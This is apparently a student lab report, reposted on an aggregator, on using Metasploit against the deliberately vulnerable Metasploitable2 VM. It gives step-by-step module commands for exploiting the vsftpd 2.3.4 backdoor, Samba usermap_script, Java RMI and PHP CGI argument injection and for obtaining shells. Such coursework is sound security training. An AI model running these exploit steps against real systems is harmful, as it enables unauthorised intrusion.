20222420 2024-2025-1 《网络与系统攻防技术》实验六实验报告

news/2024/11/18 20:26:47/文章来源:https://www.cnblogs.com/SAltria/p/18547471

20222420 2024-2025-1 《网络与系统攻防技术》实验六实验报告

1.实验内容

(1)前期渗透

  • ①主机发现(可用Aux中的arp_sweep,search一下就可以use)
  • ②端口扫描:可以直接用nmap,也可以用Aux中的portscan/tcp等
  • ③选做:也可以扫系统版本、漏洞等。

(2)Vsftpd源码包后门漏洞(21端口)

  • 漏洞原理:在特定版本的vsftpd服务器程序中,被人恶意植入代码,当用户名以“ : ) ”为结尾,服务器就会在6200端口监听,并且能够执行任意代码。

(3)SambaMS-RPC Shell命令注入漏洞(端口139)

  • 漏洞原理:Samba中负责在SAM数据库更新用户口令的代码未经过滤便将用户输入传输给了/bin/sh。如果在调用smb.conf中定义的外部脚本时,通过对/bin/sh的MS-RPC调用提交了恶意输入的话,就可能允许攻击者以nobody用户的权限执行任意命令。

(4)Java RMI SERVER命令执行漏洞(1099端口)

  • 漏洞原理:Java RMI Server的RMI注册表和RMI激活服务的默认配置存在安全漏洞,可被利用导致代码执行。

(5)PHP CGI参数执行注入漏洞(80端口)

  • 漏洞原理:CGI脚本没有正确处理请求参数,导致源代码泄露,允许远程攻击者在请求参数中插入执行命令。

2.实验过程

(1)前期渗透

①主机发现(可用Aux中的arp_sweep,search一下就可以use)

search arp_sweep找到模块,use 0使用该模块,show options查看可以设置的参数,set RHOSTS(或RHOST也行)设置目标网段,run运行。
由以下可知,该网段有5个开启的IP地址,其中192.168.150.144是靶机Metasploitable2的IP地址

②端口扫描:可以直接用nmap,也可以用Aux中的portscan/tcp等

search portscan/tcp找到模块,use 0使用该模块,show options查看可以设置的参数,set RHOST设置目标主机,set THREADS 10加快运行,run运行。
由以下可知,在1-10000的端口范围内,该靶机有个26个开启的TCP端口

③选做:也可以扫系统版本、漏洞等。

nmap -O 192.168.150.144命令扫描

(2)Vsftpd源码包后门漏洞(21端口)

  • 漏洞原理:在特定版本的vsftpd服务器程序中,被人恶意植入代码,当用户名以“😃”为结尾,服务器就会在6200端口监听,并且能够执行任意代码。
  • 利用步骤:
    • 在kali中执行msfconsole 启动metasploit
    • use exploit/unix/ftp/vsftpd_234_backdoor 选择漏洞
    • set RHOST 192.168.150.144 设置要攻击的机器IP(靶机IP)
    • exploit/run 开始攻击
    • 利用成功
    • sessions -i查看,sessions -i 1利用该session
    • 执行uname –a、 pwd、 id、whoami等命令验证

(3)SambaMS-RPC Shell命令注入漏洞(端口139)

  • 漏洞原理:Samba中负责在SAM数据库更新用户口令的代码未经过滤便将用户输入传输给了/bin/sh。如果在调用smb.conf中定义的外部脚本时,通过对/bin/sh的MS-RPC调用提交了恶意输入的话,就可能允许攻击者以nobody用户的权限执行任意命令。
  • 利用步骤:
    • use exploit/multi/samba/usermap_script 选择漏洞
    • set RHOST ip 设置要攻击的机器IP
    • exploit 开始攻击
    • 利用成功 执行uname –a、 pwd、 id、whoami验证

(4)Java RMI SERVER命令执行漏洞(1099端口)

  • 漏洞原理:Java RMI Server的RMI注册表和RMI激活服务的默认配置存在安全漏洞,可被利用导致代码执行。
  • 操作步骤:
    • 首先查看1099端口是否打开。
    • 然后在MSF中:
      • use exploit/multi/misc/java_rmi_server
      • show options 查看配置参数
      • set RHOST 192.168.150.144
      • exploit/run
      • shell (进入meterpreter时,使用uname –a、 pwd、 id、whoami验证下)

(5)PHP CGI参数执行注入漏洞(80端口)

  • 漏洞原理:CGI脚本没有正确处理请求参数,导致源代码泄露,允许远程攻击者在请求参数中插入执行命令。
  • 操作步骤:
    • 在kali中执行msfconsole,启动metasploit
    • msf > use exploit/multi/http/php_cgi_arg_injection 选择漏洞
    • set RHOST ip 设置要攻击的机器IP
    • exploit/run 开始攻击
    • shell (进入meterpreter时,使用uname –a、 pwd、 id、whoami验证下)
    • 执行uname –a、 pwd、 id、whoami验证

3.问题及解决方案

  • 问题:利用Vsftpd源码包后门漏洞时,在输入sessions -i 1未显示shell应有的命令行提示符。
  • 解决方案:本以为是出错了准备重做,但输入pwd等指令后有回应。原来这里不会显示命令行提示符。

4.学习感悟、思考等

本次实验中,从前期的主机发现、端口扫描,到针对特定漏洞的深入分析和利用,每一步都让我对网络安全有了更深入的理解和认识。
在前期渗透阶段,我学习了使用各种工具进行主机发现和端口扫描。arp_sweep和nmap等工具的使用让我能够快速发现目标主机并探测其开放的端口。这一过程不仅锻炼了我的实践能力,也让我对目标系统的网络拓扑和端口开放情况有了初步的了解。此外,我还掌握了各种渗透测试技术和工具的使用方法,深入理解了各种常见漏洞的原理和利用方式。这些经验和知识让我更加深刻地认识到了网络安全的重要性和复杂性。

参考资料

  • 《Java程序设计与数据结构教程(第二版)》
  • 《Java程序设计与数据结构教程(第二版)》学习指导

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.hqwc.cn/news/836368.html

如若内容造成侵权/违法违规/事实不符,请联系编程知识网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

Wincc 7.5SP2下VBA编程批量设置变量线性标定

继续学习wincc下面VBA编程,这个练习实现变量线性标定。 在前面练习基础上做,有REAL1至REAL10共10个变量,通过VBA脚本对Real1至Real5设置线性标定。 写下面的VBA脚本: Sub SetTagScaleParameter()Dim hmigo As hmigoDim strTagName As StringDim i As IntegerSet hmigo = N…

20222422 2024-2025-1 《网络与系统攻防技术》实验六实验报告

一、实验内容 本实践目标是掌握metasploit的用法。指导书参考Rapid7官网的指导教程。 https://docs.rapid7.com/metasploit/metasploitable-2-exploitability-guide/ 下载官方靶机Metasploitable2,完成下面实验内容。 用户名密码均为:msfadmin(1)前期渗透 ①主机发现(可用…

测试工程师的苦水与解药:别让这些问题毁了你的职业生涯!

咱这些测试工程师啊,外人瞅着好像工作挺简单,不就是找找软件的毛病嘛。可实际上,这里面的苦啊,就像那一团乱麻,扯都扯不清,全是无奈和心酸。 加班加到“怀疑人生” 咱这加班啊,那可真是没个头。经常整到深更半夜,感觉自己都快不是个人了,身体那是越来越差,就像个破机…

使用VS2022打开解决方案后每个项目都显示“不兼容”

1、问题描述 今天本地使用VS2022打开之前新建的项目(.Net6框架),突然出现每个项目都显示“不兼容”的问题,导致每个项目的文件都看不到了,如下图所示:2、解决办法 鼠标右键解决方案,然后选择“解析错误”选项,等待一会所有的项目即可显示出来了,如下图所示:到此,问题…

数据采集与融合技术第四次作业

作业内容 作业①: 要求: 熟练掌握 Selenium 查找HTML元素、爬取Ajax网页数据、等待HTML元素等内容。 使用Selenium框架+ MySQL数据库存储技术路线爬取“沪深A股”、“上证A股”、“深证A股”3个板块的股票数据信息。 候选网站:东方财富网:http://quote.eastmoney.com/center…

【Visio 2024软件下载与安装教程-亲测好用】

Microsoft Visio 2024专业版是一款专业的专业矢量绘图软件。Visio 2024不但新增了许多功能,而且还优化了众多性能,比如用户界面优化、更多图形元素库、允许用户邀请其他人一起编辑和查看图表、过程自动化等等,其一系列的改动旨在给予用户们最直观、最便利的操作体验! 操作系…

工作服穿戴识别系统

工作服穿戴识别系统利用现场装好的监控摄像头24小时对工作场景进行实时监测。工作服穿戴识别系统一旦检测到员工工服穿戴不符合规定的情况,系统能够立即发出警报,提醒相关人员进行处理。通过实时监控和精准报警,工作服穿戴识别系统能够有效规范作业人员的行为。员工知道自己…

桥梁大师_钢筋图_配置汇总

1.2米桩基_【正常】 1.2米桩基_【配抗震钢筋】

值班睡岗智能监测系统

值班睡岗智能监测系统是一种利用人工智能技术,值班睡岗智能监测系统通过现场已有的摄像头进行实时视频分析的系统。系统能够自动识别监测现场人员是否在岗位上,一旦检测到离岗或睡岗行为,系统会实时抓拍并触发报警,将报警信息传送至后台监控平台。系统能够替代人工进行长时…

使用 Nginx Ingress 实现金丝雀发布/灰度发布

使用 Nginx Ingress 实现金丝雀发布/灰度发布 说明: 使用 Nginx Ingress 实现金丝雀发布的集群,需部署 Nginx Ingress 作为 Ingress Controller,并且对外暴露统一的流量入口。详情请参见 在 TKE 上部署 Nginx Ingress。 使用场景 使用 Nginx Ingress 实现金丝雀发布适用场景…

# 20222309 2024-2025-1 《网络与系统攻防技术》实验六实验报告

1.实验内容 本实践目标是掌握metasploit的用法。 指导书参考Rapid7官网的指导教程。 https://docs.rapid7.com/metasploit/metasploitable-2-exploitability-guide/ 下载官方靶机Metasploitable2,完成下面实验内容。 (1)前期渗透 ①主机发现(可用Aux中的arp_sweep,search一…